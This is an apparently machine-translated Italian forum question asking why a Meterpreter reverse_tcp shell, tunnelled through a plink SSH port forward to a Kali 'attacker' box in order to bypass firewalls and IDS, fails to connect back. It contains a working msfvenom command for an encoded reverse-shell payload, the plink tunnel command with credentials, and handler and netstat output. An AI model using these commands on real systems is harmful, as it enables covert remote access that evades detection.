quindi sto cercando di seguire questo tutorial per aggirare firewall e IDS instradando il traffico attraverso una pipe SSH e ricevendo una shell rovescia Meterpreter (reverse_tcp) da un computer Windows su Internet. Tuttavia, questo tutorial è abbastanza obsoleto e quindi sembra che abbia colpito un ostacolo.
Questo è il posto in cui mi trovo adesso:
plink -L 6666:mypublicattackerip:6666 mypublicattackerip -l sshuser -pw hssuser1
Questo è il mio output dal seguente comando eseguito in un prompt dei comandi: ("Store key in cache" non è mostrato perché l'ho già eseguito prima)
Using username "sshuser".
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 6 10:33:46 2018 from .. snip ..
]0;sshuser@kali: ~[01;31msshuser@kali[00m:[01;34m~[00m$
Ricevo una shell interattiva (ma anche deformata) dal mio box Kali che non si trova nel tutorial, ma netstat -anop tcp | findstr 6666
sembra identico a quello mostrato nel tutorial, quindi procedo.
TCP 127.0.0.1:6666 0.0.0.0:0 LISTENING 12828
Quindi ho impostato un Meterpreter multi/handler
per windows/meterpreter/reverse_tcp
con LHOST
impostato sull'indirizzo IP pubblico del mio aggressore, LPORT
impostato su 6666
e digitato exploit
.
Ho quindi eseguito il reverse shell Meterpreter generato con la stessa riga di comando utilizzata nell'esercitazione
msfvenom -p windows/meterpreter/reverse_tcp -a x86 LHOST=127.0.0.1 LPORT=6666 --encoder x86/shikata_ga_nai -b'\x00' --format exe > reverse_tcpPlink6666Encoded.exe
con Plink connesso così come il mio gestore che ascolta ed ecco che non riesco a tornare alla mia scatola di Kali.
msf exploit(multi/handler) > exploit
[-] Handler failed to bind to mypublicattackerip:6666:- -
[*] Started reverse TCP handler on 0.0.0.0:6666
.. no sessions ..
Tuttavia, posso vedere da Process Explorer che:
A. Il processo reverse_tcpPlink6666Encoded.exe
è e continua ad essere vivo e quello
B. Se vado alla scheda TCP / IP per quel processo, conferma che ha stabilito con successo una connessione con qualcosa:
e basta.
Ecco cosa dice netstat
su tutto questo:
TCP 127.0.0.1:6666 0.0.0.0:0 LISTENING 17820
TCP 127.0.0.1:6666 127.0.0.1:55223 ESTABLISHED 17820
TCP 127.0.0.1:55223 127.0.0.1:6666 ESTABLISHED 14568
Quindi riassumendo tutto, non sono sicuro del motivo per cui non ottengo una connessione inversa al mio nodo Kali dopo tutto questo.
Grazie come sempre.